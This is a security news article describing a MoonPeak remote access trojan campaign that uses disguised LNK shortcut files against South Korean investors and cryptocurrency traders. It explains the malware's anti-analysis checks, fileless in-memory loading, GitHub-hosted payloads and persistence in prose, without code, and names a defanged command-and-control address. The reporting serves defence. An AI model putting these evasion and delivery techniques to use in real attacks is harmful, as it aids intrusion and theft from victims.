Threat actors are weaponizing LNK files to deploy the MoonPeak malware, a dangerous remote access trojan targeting Windows systems. This sophisticated campaign, believed to be orchestrated by North Korea-affiliated groups, primarily ensnares South Korean investors and cryptocurrency traders by disguising malicious files as legitimate trading strategy documents. The attack chain begins with a deceptive LNK shortcut that, when clicked, silently executes an obfuscated PowerShell script, deploying the MoonPeak malware while simultaneously presenting a decoy PDF to lull victims into a false sense of security.
The campaign, first identified in January 2026, leverages LNK files with Korean filenames that suggest financial or investment-related content. These files contain an embedded XOR-encoded PDF, which opens normally upon interaction, masking the malicious activity. Behind this deceptive facade, a hidden PowerShell script initiates a multi-stage infection process, establishing persistence on the compromised system and establishing communication with attacker-controlled remote servers. IIJ Security Diary analysts have been instrumental in uncovering the full infection flow, providing detailed insights into this evolving threat that previously lacked comprehensive documentation.
Researchers discovered that the threat actors are utilizing GitHub repositories to host malicious payloads, a technique known as Living Off Trusted Sites (LOTS). This method allows them to circumvent security measures that typically flag suspicious domains, demonstrating a strategic approach to evading detection by embedding their malicious infrastructure within a legitimate and trusted platform.
Multi-Stage Infection Mechanism and Evasion Tactics of MoonPeak Malware
The MoonPeak infection process is characterized by a three-stage execution mechanism, meticulously designed to avoid security analysis and ensure persistent access. The initial stage involves a crucial environmental check. The LNK file actively scans for the presence of security tools and virtual environments by searching for specific running processes such as IDA Pro, Wireshark, OllyDbg, and various sandbox indicators. If any analysis tools are detected, the script terminates immediately, preventing researchers from scrutinizing its behavior and ensuring it only executes on genuine victim machines.
Following a successful environment check, the PowerShell script proceeds to create randomly named folders and files within the temporary directory. From these locations, it downloads additional scripts from remote servers. To ensure continued operation even after a system reboot, a scheduled task is created, automating the malware’s execution. This mechanism is critical for maintaining a persistent presence on the infected system.
The second stage involves the retrieval of a GZIP-compressed payload. This payload is downloaded from a GitHub repository and, significantly, is decompressed and loaded directly into the system’s memory without being written to the disk. This in-memory execution significantly complicates detection by traditional file-scanning antivirus solutions.
The final stage is the deployment of the MoonPeak malware itself. The malware is obfuscated using ConfuserEx, a technique designed to hinder decompilation and reverse-engineering efforts, making it more challenging for security analysts to understand its inner workings. Once active, the MoonPeak malware establishes communication with its command-and-control server, located at 27.102.137[.]88 on port 443. This connection enables the attackers to remotely control the infected machines, potentially granting them full access to sensitive data and system functionalities.
The continuous evolution of malware delivery techniques, such as the use of LNK files and LOTS, highlights the persistent and adaptive nature of cyber threats targeting Windows users. Organizations and individuals, particularly those in the financial sector or dealing with cryptocurrency, are urged to maintain heightened vigilance against such sophisticated attacks. Staying informed about emerging threats and implementing robust cybersecurity practices, including regular software updates and employee security awareness training, remains paramount in mitigating these risks.